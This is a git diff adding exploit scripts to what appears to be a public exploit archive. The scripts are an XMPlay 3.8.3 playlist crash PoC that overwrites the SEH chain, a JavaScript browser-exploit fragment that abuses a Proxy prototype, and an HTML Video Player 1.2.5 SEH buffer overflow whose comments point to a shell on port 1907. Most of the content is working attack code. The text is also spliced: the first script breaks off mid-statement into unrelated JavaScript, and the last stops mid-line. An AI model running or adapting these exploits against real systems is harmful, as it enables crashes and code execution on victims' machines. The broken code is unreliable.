diff --git a/exploits/windows/dos/45887.py b/exploits/windows/dos/45887.py
new file mode 100755
index 000000000..1e4b64e3b
--- /dev/null
+++ b/exploits/windows/dos/45887.py
@@ -0,0 +1,44 @@
+# Exploit Title: XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)
+# Date: 2018-11-18
+# Exploit Author: s7acktrac3
+# Vendor Homepage: https://www.xmplay.com/
+# Software Link: https://support.xmplay.com/files_view.php?file_id=676
+# Version: 3.8.3 (latest)
+# Tested on: Windows XP/7/8
+# CVE : N/A
+#
+# Lauch XMPlay and either drag xmplay.m3u into the XMPlay window or
+# File Menu-> select winamp.m3u and Crash!
+# -*- coding: utf-8 -*-
+#
+# Note: Successfully can overwrite the SEH chain & control the handler and nSEH
+# but the address get mangled & unreconizable, for this reason could not turn into
+# code execution.
+
+import struct
+from struct import pack
+
+file_data = "#EXTM3U\n\r"
+file_data += "#EXTINF:200,Sleep Away\n\r"
+file_data += "http://test."
+
+max_size = 3000 - 1
+nseh_offset = 656
+
+seh_overwrite = pack(" {
+ let buggy = [1];
+ let arr = [1, 2];
+
+ arr.getPrototypeOf = Object.prototype.valueOf;
+
+ buggy.__proto__ = new Proxy({}, arr);
+
+ memset(buggy, -524286, 1);
+ trigger(arr, buggy);
+
+ alert(arr);
+ }, 100);
+}
+
+main();
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45888.py b/exploits/windows_x86/local/45888.py
new file mode 100755
index 000000000..4f0148493
--- /dev/null
+++ b/exploits/windows_x86/local/45888.py
@@ -0,0 +1,79 @@
+# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
+# Author: Kağan Çapar
+# Discovery Date: 2018-11-16
+# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
+# Vendor Homepage : http://www.html5videoplayer.net
+# Tested Version: 1.2.5
+# Tested on OS: Windows XP SP3 *ENG
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" and copy content to clipboard
+# Open software, click Help > Register and paste "Username" click "OK"
+# Finally, Connect victim machine on port your localport "1907"
+
+#!/usr/bin/python
+import struct
+
+#SEH chain of main thread, item 0
+#Address=0012EAF4
+#SE handler=41414141
+#=> next_handler below!
+#SEH chain of main thread, item 0
+#Address=0012EAF4
+#SE handler=336F4332 =>
+
+#7C901931 5E POP ESI
+#7C901932 5B POP EBX
+#7C901933 C3 RETN
+
+#Executable modules, item 14
+#Base=7C900000
+#Size=000B2000 (729088.)
+#Entry=7C912AFC ntdll.
+#Name=ntdll (system)
+#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
+#Path=C:\WINDOWS\system32\ntdll.dll
+
+file = open("exploit.txt", "w")
+buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124
+buf+= "\xEB\x06\x90\x90" #6b jmp code
+buf+= struct.pack('